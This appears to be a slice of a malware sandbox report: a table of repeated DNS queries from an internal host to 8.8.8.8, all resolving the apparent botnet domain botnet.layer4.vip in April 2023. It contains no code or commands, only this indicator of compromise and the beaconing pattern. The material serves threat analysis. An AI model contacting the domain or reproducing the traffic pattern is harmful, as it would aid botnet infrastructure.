                                  Apr 9, 2023 03:30:30.538731098 CEST192.168.2.238.8.8.80x9dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.591897011 CEST192.168.2.238.8.8.80x9dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.607805967 CEST192.168.2.238.8.8.80x9dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.631865025 CEST192.168.2.238.8.8.80x9dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.647885084 CEST192.168.2.238.8.8.80x3b56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.663767099 CEST192.168.2.238.8.8.80x3b56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.679248095 CEST192.168.2.238.8.8.80x3b56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.705739975 CEST192.168.2.238.8.8.80x3b56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.721348047 CEST192.168.2.238.8.8.80x3b56Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.736946106 CEST192.168.2.238.8.8.80xb896Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.761215925 CEST192.168.2.238.8.8.80xb896Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.776650906 CEST192.168.2.238.8.8.80xb896Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.801003933 CEST192.168.2.238.8.8.80xb896Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.825347900 CEST192.168.2.238.8.8.80xb896Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.841280937 CEST192.168.2.238.8.8.80x7060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.865405083 CEST192.168.2.238.8.8.80x7060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.881360054 CEST192.168.2.238.8.8.80x7060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.905472040 CEST192.168.2.238.8.8.80x7060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.921447039 CEST192.168.2.238.8.8.80x7060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.937124014 CEST192.168.2.238.8.8.80xe00fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.961350918 CEST192.168.2.238.8.8.80xe00fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.977039099 CEST192.168.2.238.8.8.80xe00fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.993170977 CEST192.168.2.238.8.8.80xe00fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.009068012 CEST192.168.2.238.8.8.80xe00fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.033291101 CEST192.168.2.238.8.8.80x3995Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.057789087 CEST192.168.2.238.8.8.80x3995Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.074013948 CEST192.168.2.238.8.8.80x3995Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.090780973 CEST192.168.2.238.8.8.80x3995Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.115406990 CEST192.168.2.238.8.8.80x3995Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.132348061 CEST192.168.2.238.8.8.80x25ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.148231983 CEST192.168.2.238.8.8.80x25ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.173196077 CEST192.168.2.238.8.8.80x25ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.188890934 CEST192.168.2.238.8.8.80x25ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.213123083 CEST192.168.2.238.8.8.80x25ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.237870932 CEST192.168.2.238.8.8.80xbaaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.254563093 CEST192.168.2.238.8.8.80xbaaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.271107912 CEST192.168.2.238.8.8.80xbaaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.287272930 CEST192.168.2.238.8.8.80xbaaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.311875105 CEST192.168.2.238.8.8.80xbaaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.336524010 CEST192.168.2.238.8.8.80x9aa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.352538109 CEST192.168.2.238.8.8.80x9aa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.377389908 CEST192.168.2.238.8.8.80x9aa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.393367052 CEST192.168.2.238.8.8.80x9aa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.409286976 CEST192.168.2.238.8.8.80x9aa9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.425833941 CEST192.168.2.238.8.8.80xddb9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.450395107 CEST192.168.2.238.8.8.80xddb9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.466938972 CEST192.168.2.238.8.8.80xddb9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.483033895 CEST192.168.2.238.8.8.80xddb9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.498873949 CEST192.168.2.238.8.8.80xddb9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.514719963 CEST192.168.2.238.8.8.80xd756Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.530720949 CEST192.168.2.238.8.8.80xd756Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.553030014 CEST192.168.2.238.8.8.80xd756Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.578222990 CEST192.168.2.238.8.8.80xd756Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.602729082 CEST192.168.2.238.8.8.80xd756Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.618565083 CEST192.168.2.238.8.8.80x24cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.634624004 CEST192.168.2.238.8.8.80x24cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.651104927 CEST192.168.2.238.8.8.80x24cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.667618036 CEST192.168.2.238.8.8.80x24cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.683880091 CEST192.168.2.238.8.8.80x24cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.711265087 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.727648020 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.753017902 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.768682957 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.784348965 CEST192.168.2.238.8.8.80x79b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.808914900 CEST192.168.2.238.8.8.80x7829Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.833585978 CEST192.168.2.238.8.8.80x7829Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.849272966 CEST192.168.2.238.8.8.80x7829Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.873512030 CEST192.168.2.238.8.8.80x7829Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.889710903 CEST192.168.2.238.8.8.80x7829Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.905673027 CEST192.168.2.238.8.8.80x29a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.921246052 CEST192.168.2.238.8.8.80x29a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.945779085 CEST192.168.2.238.8.8.80x29a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.962183952 CEST192.168.2.238.8.8.80x29a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:31.978024006 CEST192.168.2.238.8.8.80x29a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.002161026 CEST192.168.2.238.8.8.80x8e35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.017987013 CEST192.168.2.238.8.8.80x8e35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.033453941 CEST192.168.2.238.8.8.80x8e35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.049207926 CEST192.168.2.238.8.8.80x8e35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.073649883 CEST192.168.2.238.8.8.80x8e35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.098292112 CEST192.168.2.238.8.8.80x756fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.113814116 CEST192.168.2.238.8.8.80x756fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.138123989 CEST192.168.2.238.8.8.80x756fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.162096977 CEST192.168.2.238.8.8.80x756fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.186114073 CEST192.168.2.238.8.8.80x756fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.210166931 CEST192.168.2.238.8.8.80xfda4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.225800037 CEST192.168.2.238.8.8.80xfda4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.241374016 CEST192.168.2.238.8.8.80xfda4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.265801907 CEST192.168.2.238.8.8.80xfda4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.290163040 CEST192.168.2.238.8.8.80xfda4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.314856052 CEST192.168.2.238.8.8.80xe96bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.338972092 CEST192.168.2.238.8.8.80xe96bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.354547024 CEST192.168.2.238.8.8.80xe96bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.379036903 CEST192.168.2.238.8.8.80xe96bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.394968033 CEST192.168.2.238.8.8.80xe96bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.419198036 CEST192.168.2.238.8.8.80x3b59Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.434858084 CEST192.168.2.238.8.8.80x3b59Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.450829983 CEST192.168.2.238.8.8.80x3b59Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.475440025 CEST192.168.2.238.8.8.80x3b59Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.499619007 CEST192.168.2.238.8.8.80x3b59Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.524100065 CEST192.168.2.238.8.8.80x9817Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.548263073 CEST192.168.2.238.8.8.80x9817Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.572470903 CEST192.168.2.238.8.8.80x9817Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.588272095 CEST192.168.2.238.8.8.80x9817Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.603876114 CEST192.168.2.238.8.8.80x9817Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.628241062 CEST192.168.2.238.8.8.80xaf24Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.644149065 CEST192.168.2.238.8.8.80xaf24Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.668699026 CEST192.168.2.238.8.8.80xaf24Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.684712887 CEST192.168.2.238.8.8.80xaf24Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.712343931 CEST192.168.2.238.8.8.80xaf24Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.728717089 CEST192.168.2.238.8.8.80x52c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.763524055 CEST192.168.2.238.8.8.80x52c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.779201984 CEST192.168.2.238.8.8.80x52c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.803602934 CEST192.168.2.238.8.8.80x52c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.819102049 CEST192.168.2.238.8.8.80x52c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.843332052 CEST192.168.2.238.8.8.80xcbe3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.858789921 CEST192.168.2.238.8.8.80xcbe3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.882781029 CEST192.168.2.238.8.8.80xcbe3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.898456097 CEST192.168.2.238.8.8.80xcbe3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.922583103 CEST192.168.2.238.8.8.80xcbe3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.946727991 CEST192.168.2.238.8.8.80x31afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.962591887 CEST192.168.2.238.8.8.80x31afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:32.987006903 CEST192.168.2.238.8.8.80x31afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.002728939 CEST192.168.2.238.8.8.80x31afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.026784897 CEST192.168.2.238.8.8.80x31afStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.042571068 CEST192.168.2.238.8.8.80x240eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.058237076 CEST192.168.2.238.8.8.80x240eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.073729992 CEST192.168.2.238.8.8.80x240eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.089620113 CEST192.168.2.238.8.8.80x240eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.114068031 CEST192.168.2.238.8.8.80x240eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.130212069 CEST192.168.2.238.8.8.80x82a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.145906925 CEST192.168.2.238.8.8.80x82a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.161782980 CEST192.168.2.238.8.8.80x82a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.186182022 CEST192.168.2.238.8.8.80x82a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.210583925 CEST192.168.2.238.8.8.80x82a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.234951019 CEST192.168.2.238.8.8.80x5489Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.259321928 CEST192.168.2.238.8.8.80x5489Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.283447027 CEST192.168.2.238.8.8.80x5489Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.307599068 CEST192.168.2.238.8.8.80x5489Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.323538065 CEST192.168.2.238.8.8.80x5489Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.347906113 CEST192.168.2.238.8.8.80xa5a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.372431993 CEST192.168.2.238.8.8.80xa5a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.396936893 CEST192.168.2.238.8.8.80xa5a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.421236038 CEST192.168.2.238.8.8.80xa5a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.436899900 CEST192.168.2.238.8.8.80xa5a1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.461622953 CEST192.168.2.238.8.8.80x7691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.477432013 CEST192.168.2.238.8.8.80x7691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.502109051 CEST192.168.2.238.8.8.80x7691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.517749071 CEST192.168.2.238.8.8.80x7691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.542341948 CEST192.168.2.238.8.8.80x7691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.566875935 CEST192.168.2.238.8.8.80x5028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.582606077 CEST192.168.2.238.8.8.80x5028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.607372046 CEST192.168.2.238.8.8.80x5028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.631921053 CEST192.168.2.238.8.8.80x5028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.656482935 CEST192.168.2.238.8.8.80x5028Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.681149960 CEST192.168.2.238.8.8.80x9481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.711360931 CEST192.168.2.238.8.8.80x9481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.735766888 CEST192.168.2.238.8.8.80x9481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.760369062 CEST192.168.2.238.8.8.80x9481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.776434898 CEST192.168.2.238.8.8.80x9481Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.800525904 CEST192.168.2.238.8.8.80x6a0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.816365004 CEST192.168.2.238.8.8.80x6a0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.832321882 CEST192.168.2.238.8.8.80x6a0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.848294020 CEST192.168.2.238.8.8.80x6a0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.863899946 CEST192.168.2.238.8.8.80x6a0fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.879951954 CEST192.168.2.238.8.8.80xe1c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.904472113 CEST192.168.2.238.8.8.80xe1c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.920067072 CEST192.168.2.238.8.8.80xe1c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.944504976 CEST192.168.2.238.8.8.80xe1c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.960151911 CEST192.168.2.238.8.8.80xe1c5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:33.984477043 CEST192.168.2.238.8.8.80xe1b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.008934975 CEST192.168.2.238.8.8.80xe1b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.033010960 CEST192.168.2.238.8.8.80xe1b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.048914909 CEST192.168.2.238.8.8.80xe1b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.064708948 CEST192.168.2.238.8.8.80xe1b8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.080729008 CEST192.168.2.238.8.8.80x55d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.097285032 CEST192.168.2.238.8.8.80x55d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.121488094 CEST192.168.2.238.8.8.80x55d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.145581007 CEST192.168.2.238.8.8.80x55d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.169713020 CEST192.168.2.238.8.8.80x55d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.193974018 CEST192.168.2.238.8.8.80x7ba9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.218143940 CEST192.168.2.238.8.8.80x7ba9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.242269993 CEST192.168.2.238.8.8.80x7ba9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.266469955 CEST192.168.2.238.8.8.80x7ba9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.290942907 CEST192.168.2.238.8.8.80x7ba9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.315216064 CEST192.168.2.238.8.8.80x25f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.330662012 CEST192.168.2.238.8.8.80x25f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.355125904 CEST192.168.2.238.8.8.80x25f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.379726887 CEST192.168.2.238.8.8.80x25f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.404369116 CEST192.168.2.238.8.8.80x25f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.428735971 CEST192.168.2.238.8.8.80x38b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.452919960 CEST192.168.2.238.8.8.80x38b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.477176905 CEST192.168.2.238.8.8.80x38b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.492708921 CEST192.168.2.238.8.8.80x38b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.508539915 CEST192.168.2.238.8.8.80x38b5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.533130884 CEST192.168.2.238.8.8.80x9eacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.548985004 CEST192.168.2.238.8.8.80x9eacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:34.573152065 CEST192.168.2.238.8.8.80x9eacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
